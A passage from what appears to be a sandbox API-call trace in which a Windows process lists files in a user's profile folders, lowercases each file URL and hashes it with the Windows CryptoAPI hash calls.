(_String="file:///c:/users/ciihmnxmn6ps/desktop/oazobv-gdm/eeyb71dci6e0acglsyj.mp3") returned 0x48 [0067.328] CryptCreateHash (in: hProv=0x671840, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x198250 | out: phHash=0x198250) returned 1 [0067.328] wcslen (_String="file:///c:/users/ciihmnxmn6ps/desktop/oazobv-gdm/eeyb71dci6e0acglsyj.mp3/") returned 0x49 [0067.328] CryptHashData (hHash=0x65ee08, pbData=0x198270, dwDataLen=0x94, dwFlags=0x0) returned 1 [0067.328] CryptGetHashParam (in: hHash=0x65ee08, dwParam=0x2, pbData=0x198234, pdwDataLen=0x19824c, dwFlags=0x0 | out: pbData=0x198234, pdwDataLen=0x19824c) returned 1 [0067.329] CryptDestroyHash (hHash=0x65ee08) returned 1 [0067.329] wcslen (_String="file:///C:/Users/CIiHmnxMn6Ps/Music/cZp7-eTNxLNDQFn/k3vwoO771R7ylvuEX3.m4a") returned 0x4a [0067.329] _wcslwr (in: _String="file:///C:/Users/CIiHmnxMn6Ps/Music/cZp7-eTNxLNDQFn/k3vwoO771R7ylvuEX3.m4a" | out: _String="file:///c:/users/ciihmnxmn6ps/music/czp7-etnxlndqfn/k3vwoo771r7ylvuex3.m4a") returned="file:///c:/users/ciihmnxmn6ps/music/czp7-etnxlndqfn/k3vwoo771r7ylvuex3.m4a" [0067.329] CryptCreateHash (in: hProv=0x671840, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x198250 | out: phHash=0x198250) returned 1 [0067.329] wcslen (_String="file:///c:/users/ciihmnxmn6ps/music/czp7-etnxlndqfn/k3vwoo771r7ylvuex3.m4a") returned 0x4a [0067.329] CryptHashData (hHash=0x65f088, pbData=0x198270, dwDataLen=0x96, dwFlags=0x0) returned 1 [0067.329] CryptGetHashParam (in: hHash=0x65f088, dwParam=0x2, pbData=0x198234, pdwDataLen=0x19824c, dwFlags=0x0 | out: pbData=0x198234, pdwDataLen=0x19824c) returned 1 [0067.329] CryptDestroyHash (hHash=0x65f088) returned 1 [0067.329] wcslen (_String="file:///c:/users/ciihmnxmn6ps/music/czp7-etnxlndqfn/k3vwoo771r7ylvuex3.m4a") returned 0x4a [0067.329] CryptCreateHash (in: hProv=0x671840, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x198250 | out: phHash=0x198250) returned 1 [0067.329] wcslen (_String="file:///c:/users/ciihmnxmn6ps/music/czp7-etnxlndqfn/k3vwoo771r7ylvuex3.m4a/") returned 0x4b [0067.329] CryptHashData (hHash=0x65ee08, pbData=0x198270, dwDataLen=0x98, dwFlags=0x0) returned 1 [0067.329] CryptGetHashParam (in: hHash=0x65ee08, dwParam=0x2, pbData=0x198234, pdwDataLen=0x19824c, dwFlags=0x0 | out: pbData=0x198234, pdwDataLen=0x19824c) returned 1 [0067.329] CryptDestroyHash (hHash=0x65ee08) returned 1 [0067.329] wcslen (_String="file:///C:/Users/CIiHmnxMn6Ps/Pictures/_WVdo-/laxv.gif") returned 0x36 [0067.329] _wcslwr (in: _String="file:///C:/Users/CIiHmnxMn6Ps/Pictures/_WVdo-/laxv.gif" | out: _String="file:///c:/users/ciihmnxmn6ps/pictures/_wvdo-/laxv.gif") returned="file:///c:/users/ciihmnxmn6ps/pictures/_wvdo-/laxv.gif" [0067.329] CryptCreateHash (in: hProv=0x671840, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x198250 | out: phHash=0x198250) returned 1 [0067.329] wcslen (_String="file:///c:/users/ciihmnxmn6ps/pictures/_wvdo-/laxv.gif") returned 0x36 [0067.329] CryptHashData (hHash=0x65ec88, pbData=0x198270, dwDataLen=0x6e, dwFlags=0x0) returned 1 [0067.329] CryptGetHashParam (in: hHash=0x65ec88, dwParam=0x2, pbData=0x198234, pdwDataLen=0x19824c, dwFlags=0x0 | out: pbData=0x198234, pdwDataLen=0x19824c) returned 1 [0067.329] CryptDestroyHash (hHash=0x65ec88) returned 1 [0067.329] wcslen (_String="file:///c:/users/ciihmnxmn6ps/pictures/_wvdo-/laxv.gif") returned 0x36 [0067.329] CryptCreateHash (in: hProv=0x671840, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x198250 | out: phHash=0x198250) returned 1 [0067.329] wcslen (_String="file:///c:/users/ciihmnxmn6ps/pictures/_wvdo-/laxv.gif/") returned 0x37 [0067.329] CryptHashData (hHash=0x65f088, pbData=0x198270, dwDataLen=0x70, dwFlags=0x0) returned 1 [0067.329] CryptGetHashParam (in: hHash=0x65f088, dwParam=0x2, pbData=0x198234, pdwDataLen=0x19824c, dwFlags=0x0 | out: pbData=0x198234, pdwDataLen=0x19824c) returned 1 [0067.329] CryptDestroyHash (hHash=0x65f088) returned 1 [0067.329] wcslen (_String="file:///C:/Users/CIiHmnxMn6Ps/Desktop/p72mwNsoaskX8JFjLk6c.wav") returned 0x3e [0067.329] _wcslwr (in: _String="file:///C:/Users/CIiHmnxMn6Ps/Desktop/p72mwNsoaskX8JFjLk6c.wav" | out: _String="file:///c:/users/ciihmnxmn6ps/desktop/p72mwnsoaskx8jfjlk6c.wav") returned="file:///c:/users/ciihmnxmn6ps/desktop/p72mwnsoaskx8jfjlk6c.wav" [0067.329] CryptCreateHash (in: hProv=0x671840, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x198250 | out: phHash=0x198250) returned 1 [0067.329] wcslen (_String="file:///c:/users/ciihmnxmn6ps/desktop/p72mwnsoaskx8jfjlk6c.wav") returned 0x3e [0067.329] CryptHashData (hHash=0x65ec88, pbData=0x198270, dwDataLen=0x7e, dwFlags=0x0) returned 1 [0067.329] CryptGetHashParam (in: hHash=0x65ec88, dwParam=0x2, pbData=0x198234, pdwDataLen=0x19824c, dwFlags=0x0 | out: pbData=0x198234, pdwDataLen=0x19824c) returned 1 [0067.329] CryptDestroyHash (hHash=0x65ec88) returned 1 [0067.329] wcslen (_String="file:///c:/users/ciihmnxmn6ps/desktop/p72mwnsoaskx8jfjlk6c.wav") returned 0x3e [0067.329] CryptCreateHash (in: hProv=0x671840, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x198250 | out: phHash=0x198250) returned 1 [0067.329] wcslen (_String="file:///c:/users/ciihmnxmn6ps/desktop/p72mwnsoaskx8jfjlk6c.wav/") returned 0x3f [0067.329] CryptHashData (hHash=0x65f088, pbData=0x198270, dwDataLen=0x80, dwFlags=0x0) returned 1 [0067.329] CryptGetHashParam (in: hHash=0x65f088, dwParam=0x2, pbData=0x198234, pdwDataLen=0x19824c, dwFlags=0x0 | out: pbData=0x198234, pdwDataLen=0x19824c) returned 1 [0067.329] CryptDestroyHash (hHash=0x65f088) returned 1 [0067.329] wcslen (_String="file:///C:/Users/CIiHmnxMn6Ps/Desktop/EY-85l4ZHmyKzZn.docx") returned 0x3a [0067.329] _wcslwr (in: _String="file:///C:/Users/CIiHmnxMn6Ps/Desktop/EY-85l4ZHmyKzZn.docx" | out: _String="file:///c:/users/ciihmnxmn6ps/desktop/ey-85l4zhmykzzn.docx") returned="file:///c:/users/ciihmnxmn6ps/desktop/ey-85l4zhmykzzn.docx" [0067.329] CryptCreateHash (in: hProv=0x671840, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x198250 | out: phHash=0x198250) returned 1 [0067.329] wcslen (_String="file:///c:/users/ciihmnxmn6ps/desktop/ey-85l4zhmykzzn.docx") returned 0x3a [0067.329] CryptHashData (hHash=0x65f2c8, pbData=0x198270, dwDataLen=0x76, dwFlags=0x0) returned 1 [0067.329] CryptGetHashParam (in: hHash=0x65f2c8, dwParam=0x2, pbData=0x198234, pdwDataLen=0x19824c, dwFlags=0x0 | out: pbData=0x198234, pdwDataLen=0x19824c) returned 1 [0067.329] CryptDestroyHash (hHash=0x65f2c8) returned 1 [0067.329] wcslen (_String="file:///c:/users/ciihmnxmn6ps/desktop/ey-85l4zhmykzzn.docx") returned 0x3a [0067.330] CryptCreateHash (in: hProv=0x671840, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x198250 | out: phHash=0x198250) returned 1 [0067.330] wcslen (_String="file:///c:/users/ciihmnxmn6ps/desktop/ey-85l4zhmykzzn.docx/") returned 0x3b [0067.330] CryptHashData (hHash=0x65f088, pbData=0x198270, dwDataLen=0x78, dwFlags=0x0) returned 1 [0067.330] CryptGetHashParam (in: hHash=0x65f088, dwParam=0x2, pbData=0x198234, pdwDataLen=0x19824c, dwFlags=0x0 | out: pbData=0x198234, pdwDataLen=0x19824c) returned 1 [0067.330] CryptDestroyHash (hHash=0x65f088) returned 1 [0067.330] wcslen (_String="file:///C:/Users/CIiHmnxMn6Ps/Music/hnAk4r/MBESYMhlN%20bMw/Zxr1UNIGqisvCNnn/jhDw-E/l_AsyXf/ryzcO9uW5%20na%20NkIn.m4a") returned 0x74 [0067.330] _wcslwr (in: _String="file:///C:/Users/CIiHmnxMn6Ps/Music/hnAk4r/MBESYMhlN%20bMw/Zxr1UNIGqisvCNnn/jhDw-E/l_AsyXf/ryzcO9uW5%20na%20NkIn.m4a" | out: _String="file:///c:/users/ciihmnxmn6ps/music/hnak4r/mbesymhln%20bmw/zxr1unigqisvcnnn/jhdw-e/l_asyxf/ryzco9uw5%20na%20nkin.m4a") returned="file:///c:/users/ciihmnxmn6ps/music/hnak4r/mbesymhln%20bmw/zxr1unigqisvcnnn/jhdw-e/l_asyxf/ryzco9uw5%20na%20nkin.m4a" [0067.330] CryptCreateHash (in: hProv=0x671840, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x198250 | out: phHash=0x198250) returned 1 [0067.330] wcslen (_String="file:///c:/users/ciihmnxmn6ps/music/hnak4r/mbesymhln%20bmw/zxr1unigqisvcnnn/jhdw-e/l_asyxf/ryzco9uw5%20na%20nkin.m4a") returned 0x74 [0067.330] CryptHashData (hHash=0x65ec88, pbData=0x198270, dwDataLen=0xea, dwFlags=0x0) returned 1 [0067.330] CryptGetHashParam (in: hHash=0x65ec88, dwParam=0x2, pbData=0x198234, pdwDataLen=0x19824c, dwFlags=0x0 | out: pbData=0x198234, pdwDataLen=0x19824c) returned 1 [0067.330] CryptDestroyHash (hHash=0x65ec88) returned 1 [0067.330] wcslen (_String="file:///c:/users/ciihmnxmn6ps/music/hnak4r/mbesymhln%20bmw/zxr1unigqisvcnnn/jhdw-e/l_asyxf/ryzco9uw5%20na%20nkin.m4a") returned 0x74 [0067.330] CryptCreateHash (in: hProv=0x671840, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x198250 | out: phHash=0x198250) returned 1 [0067.330] wcslen (_String="file:///c:/users/ciihmnxmn6ps/music/hnak4r/mbesymhln%20bmw/zxr1unigqisvcnnn/jhdw-e/l_asyxf/ryzco9uw5%20na%20nkin.m4a/") returned 0x75 [0067.330] CryptHashData (hHash=0x65f108, pbData=0x198270, dwDataLen=0xec, dwFlags=0x0) returned 1 [0067.330] CryptGetHashParam (in: hHash=0x65f108, dwParam=0x2, pbData=0x198234, pdwDataLen=0x19824c, dwFlags=0x0 | out: pbData=0x198234, pdwDataLen=0x19824c) returned 1 [0067.330] CryptDestroyHash (hHash=0x65f108) returned 1 [0067.330] wcslen (_String="file:///C:/Users/CIiHmnxMn6Ps/AppData/Roaming/NtipEAj_UPk8oLcHaMk.m4a") returned 0x45 [0067.330] _wcslwr (in: _String="file:///C:/Users/CIiHmnxMn6Ps/AppData/Roaming/NtipEAj_UPk8oLcHaMk.m4a" | out: _String="file:///c:/users/ciihmnxmn6ps/appdata/roaming/ntipeaj_upk8olchamk.m4a") returned="file:///c:/users/ciihmnxmn6ps/appdata/roaming/ntipeaj_upk8olchamk.m4a" [0067.330] CryptCreateHash (in: hProv=0x671840, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x198250 | out: phHash=0x198250) returned 1 [0067.330] wcslen (_String="file:///c:/users/ciihmnxmn6ps/appdata/roaming/ntipeaj_upk8olchamk.m4a") returned 0x45 [0067.330] CryptHashData (hHash=0x65f2c8, pbData=0x198270, dwDataLen=0x8c, dwFlags=0x0) returned 1 [0067.330] CryptGetHashParam (in: hHash=0x65f2c8, dwParam=0x2, pbData=0x198234, pdwDataLen=0x19824c, dwFlags=0x0 | out: pbData=0x198234, pdwDataLen=0x19824c) returned 1 [0067.330] CryptDestroyHash (hHash=0x65f2c8) returned 1 [0067.330] wcslen (_String="file:///c:/users/ciihmnxmn6ps/appdata/roaming/ntipeaj_upk8olchamk.m4a") returned 0x45 [0067.330] CryptCreateHash (in: hProv=0x671840, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x198250 | out: phHash=0x198250) returned 1 [0067.330] wcslen (_String="file:///c:/users/ciihmnxmn6ps/appdata/roaming/ntipeaj_upk8olchamk.m4a/") returned 0x46 [0067.330] CryptHashData (hHash=0x65f088, pbData=0x198270, dwDataLen=0x8e, dwFlags=0x0) returned 1 [0067.330] CryptGetHashParam (in: hHash=0x65f088, dwParam=0x2, pbData=0x198234, pdwDataLen=0x19824c, dwFlags=0x0 | out: pbData=0x198234, pdwDataLen=0x19824c) returned 1 [0067.330] CryptDestroyHash (hHash=0x65f088) returned 1 [0067.330] wcslen (_String="file:///C:/Users/CIiHmnxMn6Ps/Pictures/4q9Ob0IBjJFOe2OqH/gT8kPO") returned 0x3f [0067.330] _wcslwr (in: _String="file:///C:/Users/CIiHmnxMn6Ps/Pictures/4q9Ob0IBjJFOe2OqH/gT8kPO" | out: _String="file:///c:/users/ciihmnxmn6ps/pictures/4q9ob0ibjjfoe2oqh/gt8kpo") returned="file:///c:/users/ciihmnxmn6ps/pictures/4q9ob0ibjjfoe2oqh/gt8kpo" [0067.330] CryptCreateHash (in: hProv=0x671840, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x198250 | out: phHash=0x198250) returned 1 [0067.330] wcslen (_String="file:///c:/users/ciihmnxmn6ps/pictures/4q9ob0ibjjfoe2oqh/gt8kpo") returned 0x3f [0067.330] CryptHashData (hHash=0x65ec88, pbData=0x198270, dwDataLen=0x80, dwFlags=0x0) returned 1 [0067.330] CryptGetHashParam (in: hHash=0x65ec88, dwParam=0x2, pbData=0x198234, pdwDataLen=0x19824c, dwFlags=0x0 | out: pbData=0x198234, pdwDataLen=0x19824c) returned 1 [0067.330] CryptDestroyHash (hHash=0x65ec88) returned 1 [0067.330] wcslen (_String="file:///c:/users/ciihmnxmn6ps/pictures/4q9ob0ibjjfoe2oqh/gt8kpo") returned 0x3f [0067.330] CryptCreateHash (in: hProv=0x671840, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x198250 | out: phHash=0x198250) returned 1 [0067.330] wcslen (_String="file:///c:/users/ciihmnxmn6ps/pictures/4q9ob0ibjjfoe2oqh/gt8kpo/") returned 0x40 [0067.330] CryptHashData (hHash=0x65ec88, pbData=0x198270, dwDataLen=0x82, dwFlags=0x0) returned 1 [0067.330] CryptGetHashParam (in: hHash=0x65ec88, dwParam=0x2, pbData=0x198234, pdwDataLen=0x19824c, dwFlags=0x0 | out: pbData=0x198234, pdwDataLen=0x19824c) returned 1 [0067.330] CryptDestroyHash (hHash=0x65ec88) returned 1 [0067.330] wcslen (_String="file:///C:/Users/CIiHmnxMn6Ps/Pictures/4q9Ob0IBjJFOe2OqH/gT8kPO/g%20IHHeID.png") returned 0x4e [0067.330] _wcslwr (in: _String="file:///C:/Users/CIiHmnxMn6Ps/Pictures/4q9Ob0IBjJFOe2OqH/gT8kPO/g%20IHHeID.png" | out: _String="file:///c:/users/ciihmnxmn6ps/pictures/4q9ob0ibjjfoe2oqh/gt8kpo/g%20ihheid.png") returned="file:///c:/users/ciihmnxmn6ps/pictures/4q9ob0ibjjfoe2oqh/gt8kpo/g%20ihheid.png" [0067.330] CryptCreateHash (in: hProv=0x671840, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x198250 | out: phHash=0x198250) returned 1 [0067.330] wcslen (_String="file:///c:/users/ciihmnxmn6ps/pictures/4q9ob0ibjjfoe2oqh/gt8kpo/g%20ihheid.png") returned 0x4e [0067.331] CryptHashData (hHash=0x65f088, pbData=0x198270, dwDataLen=0x9e, dwFlags=0x0) returned 1 [0067.331] CryptGetHashParam (in: hHash=0x65f088, dwParam=0x2, pbData=0x198234, pdwDataLen=0x19824c, dwFlags=0x0 | out: pbData=0x198234, pdwDataLen=0x19824c) returned 1 [0067.331] CryptDestroyHash (hHash=0x65f088) returned 1 [0067.331] wcslen (_String="file:///c:/users/ciihmnxmn6ps/pictures/4q9ob0ibjjfoe2oqh/gt8kpo/g%20ihheid.png") returned 0x4e [0067.331] CryptCreateHash (in: hProv=0x671840, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x198250 | out: phHash=0x198250) returned 1 [0067.331] wcslen (_String="file:///c:/users/ciihmnxmn6ps/pictures/4q9ob0ibjjfoe2oqh/gt8kpo/g%20ihheid.png/") returned 0x4f [0067.331] CryptHashData (hHash=0x65f2c8, pbData=0x198270, dwDataLen=0xa0, dwFlags=0x0) returned 1 [0067.331] CryptGetHashParam (in: hHash=0x65f2c8, dwParam=0x2, pbData=0x198234, pdwDataLen=0x19824c, dwFlags=0x0 | out: pbData=0x198234, pdwDataLen=0x19824c) returned 1 [0067.331] CryptDestroyHash (hHash=0x65f2c8) returned 1 [0067.331] wcslen (_String="file:///C:/Users/CIiHmnxMn6Ps/Documents/0V337LurZ/IBbGlJ1.pdf") returned 0x3d [0067.331] _wcslwr (in: _String="file:///C:/Users/CIiHmnxMn6Ps/Documents/0V337LurZ/IBbGlJ1.pdf" | out: _String="file:///c:/users/ciihmnxmn6ps/documents/0v337lurz/ibbglj1.pdf") returned="file:///c:/users/ciihmnxmn6ps/documents/0v337lurz/ibbglj1.pdf" [0067.331] CryptCreateHash (in: hProv=0x671840, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x198250 | out: phHash=0x198250) returned 1 [0067.331] wcslen (_String="file:///c:/users/ciihmnxmn6ps/documents/0v337lurz/ibbglj1.pdf") returned 0x3d [0067.331] CryptHashData (hHash=0x65f088, pbData=0x198270, dwDataLen=0x7c, dwFlags=0x0) returned 1 [0067.331] CryptGetHashParam (in: hHash=0x65f088, dwParam=0x2, pbData=0x198234, pdwDataLen=0x19824c, dwFlags=0x0 | out: pbData=0x198234, pdwDataLen=0x19824c) returned 1 [0067.331] CryptDestroyHash (hHash=0x65f088) returned 1 [0067.331] wcslen (_String="file:///c:/users/ciihmnxmn6ps/documents/0v337lurz/ibbglj1.pdf") returned 0x3d [0067.331] CryptCreateHash (in: hProv=0x671840, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x198250 | out: phHash=0x198250) returned 1 [0067.331] wcslen (_String="file:///c:/users/ciihmnxmn6ps/documents/0v337lurz/ibbglj1.pdf/") returned 0x3e [0067.331] CryptHashData (hHash=0x65ec88, pbData=0x198270, dwDataLen=0x7e, dwFlags=0x0) returned 1 [0067.331] CryptGetHashParam (in: hHash=0x65ec88, dwParam=0x2, pbData=0x198234, pdwDataLen=0x19824c, dwFlags=0x0 | out: pbData=0x198234, pdwDataLen=0x19824c) returned 1 [0067.331] CryptDestroyHash (hHash=0x65ec88) returned 1 [0067.331] wcslen (_String="file:///C:/Users/CIiHmnxMn6Ps/Music/hnAk4r/MBESYMhlN%20bMw/Zxr1UNIGqisvCNnn/jhDw-E/l_AsyXf/PREHvPYCFoXm%20-1LO2cy.mp3") returned 0x75 [0067.331] _wcslwr (in: _String="file:///C:/Users/CIiHmnxMn6Ps/Music/hnAk4r/MBESYMhlN%20bMw/Zxr1UNIGqisvCNnn/jhDw-E/l_AsyXf/PREHvPYCFoXm%20-1LO2cy.mp3" | out: _String="file:///c:/users/ciihmnxmn6ps/music/hnak4r/mbesymhln%20bmw/zxr1unigqisvcnnn/jhdw-e/l_asyxf/prehvpycfoxm%20-1lo2cy.mp3") returned="file:///c:/users/ciihmnxmn6ps/music/hnak4r/mbesymhln%20bmw/zxr1unigqisvcnnn/jhdw-e/l_asyxf/prehvpycfoxm%20-1lo2cy.mp3" [0067.331] CryptCreateHash (in: hProv=0x671840, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x198250 | out: phHash=0x198250) returned 1 [0067.331] wcslen (_String="file:///c:/users/ciihmnxmn6ps/music/hnak4r/mbesymhln%20bmw/zxr1unigqisvcnnn/jhdw-e/l_asyxf/prehvpycfoxm%20-1lo2cy.mp3") returned 0x75 [0067.331] CryptHashData (hHash=0x65edc8, pbData=0x198270, dwDataLen=0xec, dwFlags=0x0) returned 1 [0067.331] CryptGetHashParam (in: hHash=0x65edc8, dwParam=0x2, pbData=0x198234, pdwDataLen=0x19824c, dwFlags=0x0 | out: pbData=0x198234, pdwDataLen=0x19824c) returned 1 [0067.331] CryptDestroyHash (hHash=0x65edc8) returned 1 [0067.331] wcslen (_String="file:///c:/users/ciihmnxmn6ps/music/hnak4r/mbesymhln%20bmw/zxr1unigqisvcnnn/jhdw-e/l_asyxf/prehvpycfoxm%20-1lo2cy.mp3") returned 0x75 [0067.331] CryptCreateHash (in: hProv=0x671840, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x198250 | out: phHash=0x198250) returned 1 [0067.331] wcslen (_String="file:///c:/users/ciihmnxmn6ps/music/hnak4r/mbesymhln%20bmw/zxr1unigqisvcnnn/jhdw-e/l_asyxf/prehvpycfoxm%20-1lo2cy.mp3/") returned 0x76 [0067.331] CryptHashData (hHash=0x65ee08, pbData=0x198270, dwDataLen=0xee, dwFlags=0x0) returned 1 [0067.331] CryptGetHashParam (in: hHash=0x65ee08, dwParam=0x2, pbData=0x198234, pdwDataLen=0x19824c, dwFlags=0x0 | out: pbData=0x198234, pdwDataLen=0x19824c) returned 1 [0067.331] CryptDestroyHash (hHash=0x65ee08) returned 1 [0067.331] wcslen (_String="file:///C:/Users/CIiHmnxMn6Ps/Music/hnAk4r/-NY-gN1VUEc6-DRq2.wav") returned 0x40 [0067.331] _wcslwr (in: _String="file:///C:/Users/CIiHmnxMn6Ps/Music/hnAk4r/-NY-gN1VUEc6-DRq2.wav" | out: _String="file:///c:/users/ciihmnxmn6ps/music/hnak4r/-ny-gn1vuec6-drq2.wav") returned="file:///c:/users/ciihmnxmn6ps/music/hnak4r/-ny-gn1vuec6-drq2.wav" [0067.331] CryptCreateHash (in: hProv=0x671840, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x198250 | out: phHash=0x198250) returned 1 [0067.331] wcslen (_String="file:///c:/users/ciihmnxmn6ps/music/hnak4r/-ny-gn1vuec6-drq2.wav") returned 0x40 [0067.331] CryptHashData (hHash=0x65f088, pbData=0x198270, dwDataLen=0x82, dwFlags=0x0) returned 1 [0067.331] CryptGetHashParam (in: hHash=0x65f088, dwParam=0x2, pbData=0x198234, pdwDataLen=0x19824c, dwFlags=0x0 | out: pbData=0x198234, pdwDataLen=0x19824c) returned 1 [0067.331] CryptDestroyHash (hHash=0x65f088) returned 1 [0067.331] wcslen (_String="file:///c:/users/ciihmnxmn6ps/music/hnak4r/-ny-gn1vuec6-drq2.wav") returned 0x40 [0067.331] CryptCreateHash (in: hProv=0x671840, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x198250 | out: phHash=0x198250) returned 1 [0067.331] wcslen (_String="file:///c:/users/ciihmnxmn6ps/music/hnak4r/-ny-gn1vuec6-drq2.wav/") returned 0x41 [0067.331] CryptHashData (hHash=0x65f2c8, pbData=0x198270, dwDataLen=0x84, dwFlags=0x0) returned 1 [0067.331] CryptGetHashParam (in: hHash=0x65f2c8, dwParam=0x2, pbData=0x198234, pdwDataLen=0x19824c, dwFlags=0x0 | out: pbData=0x198234, pdwDataLen=0x19824c) returned 1 [0067.331] CryptDestroyHash (hHash=0x65f2c8) returned 1 [0067.332] wcslen (_String="file:///C:/Users/CIiHmnxMn6Ps/Documents/QOg1aK_mq41JLV.docx") returned 0x3b [0067.332] _wcslwr (in: _String="file:///C:/Users/CIiHmnxMn6Ps/Documents/QOg1aK_mq41JLV.docx" | out: _String="file:///c:/users/ciihmnxmn6ps/documents/qog1ak_mq41jlv.docx") returned="file:///c:/users/ciihmnxmn6ps/documents/qog1ak_mq41jlv.docx" [0067.332] CryptCreateHash (in: hProv=0x671840, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x198250 | out: phHash=0x198250) returned 1 [0067.332] wcslen (_String="file:///c:/users/ciihmnxmn6ps/documents/qog1ak_mq41jlv.docx") returned 0x3b [0067.332] CryptHashData (hHash=0x65f2c8, pbData=0x198270, dwDataLen=0x78, dwFlags=0x0) returned 1 [0067.332] CryptGetHashParam (in: hHash=0x65f2c8, dwParam=0x2, pbData=0x198234, pdwDataLen=0x19824c, dwFlags=0x0 | out: pbData=0x198234, pdwDataLen=0x19824c) returned 1 [0067.332] CryptDestroyHash (hHash=0x65f2c8) returned 1 [0067.332] wcslen (_String="file:///c:/users/ciihmnxmn6ps/documents/qog1ak_mq41jlv.docx") returned 0x3b [0067.332] CryptCreateHash (in: hProv=0x671840, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x198250 | out: phHash=0x198250) returned 1 [0067.332] wcslen (_String="file:///c:/users/ciihmnxmn6ps/documents/qog1ak_mq41jlv.docx/") returned 0x3c [0067.332] CryptHashData (hHash=0x65f108, pbData=0x198270, dwDataLen=0x7a, dwFlags=0x0) returned 1 [0067.332] CryptGetHashParam (in: hHash=0x65f108, dwParam=0x2, pbData=0x198234, pdwDataLen=0x19824c, dwFlags=0x0 | out: pbData=0x198234, pdwDataLen=0x19824c) returned 1 [0067.332] CryptDestroyHash (hHash=0x65f108) returned 1 [0067.332] wcslen (_String="file:///C:/Users/CIiHmnxMn6Ps/Documents/ntWCj%20j63OHXnJ0RqhA.ppt") returned 0x41 [0067.332] _wcslwr (in: _String="file:///C:/Users/CIiHmnxMn6Ps/Documents/ntWCj%20j63OHXnJ0RqhA.ppt" | out: _String="file:///c:/users/ciihmnxmn6ps/documents/ntwcj%20j63ohxnj0rqha.ppt") returned="file:///c:/users/ciihmnxmn6ps/documents/ntwcj%20j63ohxnj0rqha.ppt" [0067.332] CryptCreateHash (in: hProv=0x671840, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x198250 | out: phHash=0x198250) returned 1 [0067.332] wcslen (_String="file:///c:/users/ciihmnxmn6ps/documents/ntwcj%20j63ohxnj0rqha.ppt") returned 0x41 [0067.332] CryptHashData (hHash=0x65f088, pbData=0x198270, dwDataLen=0x84, dwFlags=0x0) returned 1 [0067.332] CryptGetHashParam (in: hHash=0x65f088, dwParam=0x2, pbData=0x198234, pdwDataLen=0x19824c, dwFlags=0x0 | out: pbData=0x198234, pdwDataLen=0x19824c) returned 1 [0067.332] CryptDestroyHash (hHash=0x65f088) returned 1 [0067.332] wcslen (_String="file:///c:/users/ciihmnxmn6ps/documents/ntwcj%20j63ohxnj0rqha.ppt") returned 0x41 [0067.332] CryptCreateHash (in: hProv=0x671840, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x198250 | out: phHash=0x198250) returned 1 [0067.332] wcslen (_String="file:///c:/users/ciihmnxmn6ps/documents/ntwcj%20j63ohxnj0rqha.ppt/") returned 0x42 [0067.332] CryptHashData (hHash=0x65f088, pbData=0x198270, dwDataLen=0x86, dwFlags=0x0) returned 1 [0067.332] CryptGetHashParam (in: hHash=0x65f088, dwParam=0x2, pbData=0x198234, pdwDataLen=0x19824c, dwFlags=0x0 | out: pbData=0x198234, pdwDataLen=0x19824c) returned 1 [0067.332] CryptDestroyHash (hHash=0x65f088) returned 1 [0067.332] wcslen (_String="file:///C:/Users/CIiHmnxMn6Ps/Videos/RW4n4d9Ys.flv") returned 0x32 [0067.332] _wcslwr (in: _String="file:///C:/Users/CIiHmnxMn6Ps/Videos/RW4n4d9Ys.flv" | out: _String="file:///c:/users/ciihmnxmn6ps/videos/rw4n4d9ys.flv") returned="file:///c:/users/ciihmnxmn6ps/videos/rw4n4d9ys.flv" [0067.332] CryptCreateHash (in: hProv=0x671840, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x198250 | out: phHash=0x198250) returned 1 [0067.332] wcslen (_String="file:///c:/users/ciihmnxmn6ps/videos/rw4n4d9ys.flv") returned 0x32 [0067.332] CryptHashData (hHash=0x65f088, pbData=0x198270, dwDataLen=0x66, dwFlags=0x0) returned 1 [0067.332] CryptGetHashParam (in: hHash=0x65f088, dwParam=0x2, pbData=0x198234, pdwDataLen=0x19824c, dwFlags=0x0 | out: pbData=0x198234, pdwDataLen=0x19824c) returned 1 [0067.332] CryptDestroyHash (hHash=0x65f088) returned 1 [0067.332] wcslen (_String="file:///c:/users/ciihmnxmn6ps/videos/rw4n4d9ys.flv") returned 0x32 [0067.332] CryptCreateHash (in: hProv=0x671840, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x198250 | out: phHash=0x198250) returned 1 [0067.332] wcslen (_String="file:///c:/users/ciihmnxmn6ps/videos/rw4n4d9ys.flv/") returned 0x33 [0067.332] CryptHashData (hHash=0x65f108, pbData=0x198270, dwDataLen=0x68, dwFlags=0x0) returned 1 [0067.332] CryptGetHashParam (in: hHash=0x65f108, dwParam=0x2, pbData=0x198234, pdwDataLen=0x19824c, dwFlags=0x0 | out: pbData=0x198234, pdwDataLen=0x19824c) returned 1 [0067.332] CryptDestroyHash (hHash=0x65f108) returned 1 [0067.332] wcslen (_String="file:///C:/Users/CIiHmnxMn6Ps/Videos/_4zPQ5H6/807h.flv") returned 0x36 [0067.332] _wcslwr (in: _String="file:///C:/Users/CIiHmnxMn6Ps/Videos/_4zPQ5H6/807h.flv" | out: 